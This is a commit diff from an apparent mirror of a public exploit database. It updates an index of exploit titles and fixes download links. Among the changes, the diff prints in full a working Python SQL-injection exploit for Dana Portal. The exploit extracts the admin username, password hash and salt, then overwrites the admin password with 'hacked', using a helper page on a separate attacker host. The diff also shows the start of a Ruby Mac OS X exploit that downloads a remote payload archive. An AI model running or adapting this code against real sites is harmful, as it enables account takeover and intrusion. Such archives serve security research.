bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-04-27

Browse source 
2 new exploits
This commit is contained in:
Offensive Security 2015-04-27 05:02:03 +00:00
parent 14670d8adc
commit 029eaafec5
43 changed files with 398 additions and 241 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
files.csv
View file

@ -149,7 +149,7 @@ id,file,description,date,author,platform,type,port
154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0
@ -384,7 +384,7 @@ id,file,description,date,author,platform,type,port
413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0
417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0
418,platforms/windows/remote/418.c,"Winamp <= 5.04 Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0
418,platforms/windows/remote/418.c,"Winamp <= 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0
419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0
420,platforms/win32/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win32,dos,0
421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow Vulnerability",2004-08-27,"Tan Chew Keong",windows,remote,0
@ -539,7 +539,7 @@ id,file,description,date,author,platform,type,port
693,platforms/windows/remote/693.c,"Ability Server <= 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21
694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC",2004-12-16,"Vafa Khoshaein",windows,local,0
695,platforms/linux/local/695.c,"Cscope <= 15.5 Symlink Vulnerability Exploit",2004-12-17,Gangstuck,linux,local,0
697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0
697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0
698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0
699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0
700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0
@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit",2005-03-22,sd,linux,local,0
896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25
@ -800,7 +800,7 @@ id,file,description,date,author,platform,type,port
982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,N/A,php,webapps,0
983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0
984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0
986,platforms/windows/remote/986.html,"Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
986,platforms/windows/remote/986.html,"Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0
988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0
989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0
@ -2849,7 +2849,7 @@ id,file,description,date,author,platform,type,port
3178,platforms/multiple/local/3178.txt,"Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0
3179,platforms/multiple/local/3179.txt,"Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0
3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0
3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0
3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0
3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0
3183,platforms/php/webapps/3183.txt,"BBClone 0.31 (selectlang.php) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0
3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 (path) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0
@ -4164,7 +4164,6 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
@ -8220,7 +8219,7 @@ id,file,description,date,author,platform,type,port
8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BoF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21
8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
@ -18266,7 +18265,7 @@ id,file,description,date,author,platform,type,port
20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Remote Arbitrary File Creation Vulnerability",2001-06-23,"Michal Zalewski",unix,remote,0
20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (1)",2001-06-26,noir,solaris,local,0
20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (2)",2001-06-27,Fyodor,solaris,local,0
20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0
20973,platforms/multiple/remote/20973.txt,"Icecast 1.1.x/1.3.x Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,remote,0
20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability",2001-06-01,"Pablo Sor",solaris,local,0
@ -32912,7 +32911,7 @@ id,file,description,date,author,platform,type,port
36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
@ -33048,7 +33047,7 @@ id,file,description,date,author,platform,type,port
36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0
36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting Vulnerability",2012-01-26,"Bret Hawk",php,webapps,0
36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting Vulnerability",2012-01-26,sonyy,php,webapps,0
36633,platforms/linux/dos/36633.txt,"Wireshark Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
36637,platforms/lin_x86/shellcode/36637.c,"Disable ASLR in Linux (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
@ -33083,7 +33082,7 @@ id,file,description,date,author,platform,type,port
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0
36669,platforms/linux/dos/36669.txt,"Apache APR Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Linux x86 - Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
@ -33161,7 +33160,7 @@ id,file,description,date,author,platform,type,port
36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) - 49 bytes",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
@ -33221,5 +33220,7 @@ id,file,description,date,author,platform,type,port
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0

Can't render this file because it is too large.

264
platforms/asp/webapps/8719.py
View file

@ -1,132 +1,132 @@
#!/usr/bin/python
# Abysssec Inc Public Exploit Code
# Title : Dana Portal Remote Change Admin Password Exploit
# Affected Version : ASP Version
# Vulnerable File : albumdetail.asp
# Vendor Site : www.dana.ir
# note : no point to keep it private anymore .
# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
# The alghorithm is not really hard to break and writing cracker tool but i prefered
# To update admin password (SH1 + Salt ) with "hacked" word .
# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
# feel free to contact me at : admin [at] abysssec.com
# for working with this exploit you need two asp file for updating hash you can download both from :
# www.abysssec.com/files/dana.zip
# www.milw0rm.com/sploits/2009-dana.zip
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
import string
import urllib
import sys
import re
def Abysssec():
print "\n"
print "#####################################################"
print "# DanaPortal Remote Change Password Exploit #"
print "# www.Abysssec.com #"
print "#####################################################"
print "\n"
#Call Banner
Abysssec()
print "\n[+] Target Host: e.g: http://site.com/danaportal/"
try:
host=raw_input("\nTarget Host : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()
print "\n[+] Trying To Connect ...\n"
# Check Http in string
if host[:7] == "http://":
pass
else:
host = "http://"+host
#SQL Injection URL
sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_users=findall_users(response)
#check found user length
if len(found_ussers)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin User : ",found_users[0]
# Extract Admin Hash
hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(hash_inject).read()
findall_hashs=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Hash : ",found_hashs[0]
# Extract Admin Salt
salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(salt_inject).read()
findall_salt=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_salt=findall_salt(response)
if len(found_salt)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Salt : ",found_salt[0]
# Extract User Code
usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(usercode_inject).read()
findall_usercode=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_usercode=findall_usercode(response)
if len(found_usercode)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Code : ",found_usercode[0]
# Generate New Hash + Salt
update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
response = urllib.urlopen(update_password).read()
findall_update=re.compile('(\w+)</object>').findall
found_update=findall_update(response)
updated_hash = ''.join(found_update)
# Update Password
usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
response = urllib.urlopen(usercode_inject).read()
if len(response) == 0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
else:
print "[+] Updated Successfully \n"
print "[+] Login Url : "+host+"/manage"
print "[+] Username : "+found_users[0]
print "[+] Password : hacked"
# milw0rm.com [2009-05-18]
#!/usr/bin/python
# Abysssec Inc Public Exploit Code
# Title : Dana Portal Remote Change Admin Password Exploit
# Affected Version : ASP Version
# Vulnerable File : albumdetail.asp
# Vendor Site : www.dana.ir
# note : no point to keep it private anymore .
# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
# The alghorithm is not really hard to break and writing cracker tool but i prefered
# To update admin password (SH1 + Salt ) with "hacked" word .
# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
# feel free to contact me at : admin [at] abysssec.com
# for working with this exploit you need two asp file for updating hash you can download both from :
# www.abysssec.com/files/dana.zip
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
import string
import urllib
import sys
import re
def Abysssec():
print "\n"
print "#####################################################"
print "# DanaPortal Remote Change Password Exploit #"
print "# www.Abysssec.com #"
print "#####################################################"
print "\n"
#Call Banner
Abysssec()
print "\n[+] Target Host: e.g: http://site.com/danaportal/"
try:
host=raw_input("\nTarget Host : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()
print "\n[+] Trying To Connect ...\n"
# Check Http in string
if host[:7] == "http://":
pass
else:
host = "http://"+host
#SQL Injection URL
sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_users=findall_users(response)
#check found user length
if len(found_ussers)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin User : ",found_users[0]
# Extract Admin Hash
hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(hash_inject).read()
findall_hashs=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Hash : ",found_hashs[0]
# Extract Admin Salt
salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(salt_inject).read()
findall_salt=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_salt=findall_salt(response)
if len(found_salt)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Salt : ",found_salt[0]
# Extract User Code
usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(usercode_inject).read()
findall_usercode=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_usercode=findall_usercode(response)
if len(found_usercode)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Code : ",found_usercode[0]
# Generate New Hash + Salt
update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
response = urllib.urlopen(update_password).read()
findall_update=re.compile('(\w+)</object>').findall
found_update=findall_update(response)
updated_hash = ''.join(found_update)
# Update Password
usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
response = urllib.urlopen(usercode_inject).read()
if len(response) == 0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
else:
print "[+] Updated Successfully \n"
print "[+] Login Url : "+host+"/manage"
print "[+] Username : "+found_users[0]
print "[+] Password : hacked"
# milw0rm.com [2009-05-18]

2
platforms/cgi/webapps/17653.txt
View file

@ -10,4 +10,4 @@ http://malerisch.net/docs/advisories/adobe_robohelp_dom_cross_site_scripting_xss
For reference, original vendor advisory:
http://www.adobe.com/support/security/bulletins/apsb11-23.html
Mirror: http://www.exploit-db.com/download_pdf/17653
Mirror: http://www.exploit-db.com/docs/17653.pdf

2
platforms/linux/dos/33585.txt
View file

@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33585.tgz

2
platforms/linux/dos/36633.txt
View file

@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte
Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable.
http://www.exploit-db.com/sploits/36633.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36633.zip

2
platforms/linux/dos/36669.txt
View file

@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
http://www.exploit-db.com/sploits/36669.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36669.zip

2
platforms/multiple/dos/15086.py
View file

@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
http://www.exploit.db.com/sploits/moaub-23-exploit.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
'''
'''

2
platforms/multiple/dos/36570.txt
View file

@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de
An attacker can exploit these issues to crash the affected application, denying service to legitimate users.
http://www.exploit-db.com/sploits/36570.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36570.zip

2
platforms/multiple/dos/9731.txt
View file

@ -20,5 +20,5 @@ snort-2.8.4
snort-2.8.5.beta*
link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
poc: http://www.exploit-db.com/archive/2009-snort-unified1_bug.tar.gz
poc: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/2009-snort-unified1_bug.tar.gz
# milw0rm.com [2009-09-21]

2
platforms/multiple/remote/22509.txt
View file

@ -15,7 +15,7 @@ potential damage to their assets caused by Sophos.
The paper is available to download at the link below.
https://lock.cmpxchg8b.com/sophailv2.pdf
http://www.exploit-db.com/wp-content/themes/exploit/docs/22510.pdf
http://www.exploit-db.com/docs/22510.pdf
A working exploit for Sophos 8.0.6 on Mac is available, however the
techniques used in the exploit easily transfer to Windows and Linux,

88
platforms/osx/local/3181.rb
View file

@ -1,44 +1,44 @@
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "http://www.milw0rm.com/sploits/MOAB-22-01-2007_im.tar.gz"
